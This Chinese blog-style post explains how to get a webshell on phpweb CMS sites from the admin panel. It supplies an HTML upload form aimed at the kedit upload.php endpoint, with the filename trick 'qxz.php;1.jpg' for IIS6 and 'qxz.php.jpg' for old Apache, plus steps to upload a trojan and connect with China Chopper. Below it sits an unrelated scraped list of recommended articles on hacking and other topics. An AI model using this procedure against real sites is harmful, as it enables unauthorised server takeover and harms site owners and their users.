关于phpweb后台拿shell简单方法。
首先登录后台admin.php
登录后台管理系统后,然后把下面的文件保存为xxx.html,修改action,把 www.xxx.com 改成你的目标网站地址。 
代码文件如下:
<form name=”uploadForm” method=”post” enctype=”multipart/form-data” action=”http://www.xxx.com/kedit/upload_cgi/upload.php”> 
<input type=”text” name=”fileName” value=”qxz.php;1.jpg” /> 
<input type=”hidden” name=”attachPath” value=”news/pics/” /> 
<input type=”file” name=”fileData” size=”14″ /></td> 
<input type=”submit” name=”button” value=”确定” /> 
</form>
然后选择你的马儿再上传
上传后如果为iis6,就点击查看源码就可以找到马儿的路径了。
菜刀链接看下
PS:qxz.php;1.jpg这样的文件是允许上传的,只要服务器是IIS6就拿到webshell,低版本的apache可以试着重命名为qxz.php.jpg
代码文件下载地址:http://pan.baidu.com/s/1eRzHs

phpweb后台拿shell简单方法相关推荐

  1. phpweb后台拿shell方法

    首先登录后台admin.php(默认后台admin.php) 有的phpweb网站存在万能密码登录 帐号密码都输入:admin 'or '1'='1直接登录 登录后台管理系统后,然后把下面的文件保存为 ...

  2. php用户管理拿shell,PHPWEB网站管理系统后台拿shell

    前几天贫道拿一个IDC的分站 看到了PHPWEB 于是默认的进入了后台 不过进去之后拿shell难住了 妹夫的 去百度一下 那个方法失效 版本: V1.4.3 / 20100925 无奈中 于是在刁科 ...

  3. 后台拿shell全集

    正学习后台拿Shell的方法,今天碰巧在网上看见得到后台拿shell的汇总全集,很不错的总结,分享了!版主给个精华吧!   今天带给大家的都是些技术上的总结,有些人老问经验怎么来的,这个就是经验,希望 ...

  4. Ecshop后台拿shell方法总结

    方法一:龙儿心发明的,版本未定,估计都行. 进入后台-系统设置-Flash播放器管理 可以上传任意文件. [includes/fckeditor /editor/filemanager/connect ...

  5. php.ini $ phphome,shell 脚本安装PHP扩展的简单方法

    实例如下: #!/bin/bash #This script is to install PHP extensions #Author=steven #Email=775189187@qq.com # ...

  6. 网站后台拿shell方法总结

    今日带给大伙的都是些手艺上的总结,有些人老问经验怎么来的,这个即是经验,盼愿大伙都能成为脚本妙手. 动网上传漏洞,信任大伙拿下不少肉鸡吧.可以说是动网让upfile.asp上传文件过滤不严的漏洞昭然全 ...

  7. 建网站的最简单方法(三分钟带后台)

    建网站的最简单方法(三分钟带后台) 准备材料 服务器或者本地环境 安装过程 准备材料 织梦二次开发模板或者Ecshop二次开发模板等(我以织梦为例讲解) 如果是本地需要下载ComsenzEXP或者Wa ...

  8. 帝国 loginjs.php,帝国cms 6.6 后台拿shell

    时间:2013-02-27来源:源码库 作者:源码库 文章热度: ℃ 漏洞作者: 付弘雪 提交时间: 2013-01-21 公开时间: 2013-01-21 漏洞类型: 文件上传导致任意代码执行 简要 ...

  9. Discuz! X2.5 添加自定义数据调用模块(简单方法)

    转:http://521-wf.com/archives/46.html Discuz! X2.5 添加自定义数据调用模块(简单方法) Discuz!X系列的diy功能还是相当不错的,在对其进行二次开 ...

最新文章

  1. Python标准库——collections模块的Counter类
  2. 【美国】谷歌重返机器人背后有何深意?
  3. 使用ABAP编程实现对微软Office Word文档的操作
  4. 蚂蚁集团网络通信框架 SOFABolt 功能介绍及协议框架解析 | 开源
  5. Boostrap技能点整理之【网格系统】
  6. 160 - 16 bjanes.2
  7. Google Xpath Helper
  8. Linux20180502 六周第四次课(5月2日)
  9. 80.简单搭建nodeJS服务,访问本地站点文件
  10. 32位有符号整数_(Trivial)LeetCode 8—字符串转化为整数(atoi)
  11. 第十五章、实现属性以访问字段
  12. uclinux编译 心得一
  13. 计算机网络中的广播啥意思,卫星IP数据广播是什么意思?
  14. NCE4 L11 How to grow old
  15. http://blog.csdn.net/pizi0475/article/details/48286579 -------------(Collada 快速入门)
  16. easyphp 12 mysql 启动_easyphp使用教程
  17. Windows下使用Grub4dos无损(无需格式化)制作Windows/Linux双引导U盘并引导ISO镜像
  18. 微信提取公积金要先查征信?
  19. 黑猴子的家:Scala 常用类型
  20. Problem I. Hall of Fame (2014 Syria ICPC)

热门文章

  1. Spring Security5 Oauth2 自定义 OAuth2 Exception
  2. 经典必读:华为的数字化转型与数据治理
  3. 润生集团2022年度业绩内部汇报 | 相信 · 热爱 · 创造
  4. 数字档案管理系统平台建设方案
  5. 微信公众号自定义回复(关键词回复:文本消息、图文消息)
  6. Hexi Flexi Grid Layout
  7. python语言的计算生态规模有多大_【单选题】Python 语言的一个重要特点是它有较多的计算生态,简单理解为第三方提供的可用编程模块 / 函数库 / 组件,这个规模有多大?...
  8. r星服务器维护公告,老主机下岗了!R星宣布12月16日关闭《GTA5》PS3、Xbox 360服务器...
  9. Nginx 最大连接数配置
  10. git软件代码提交详解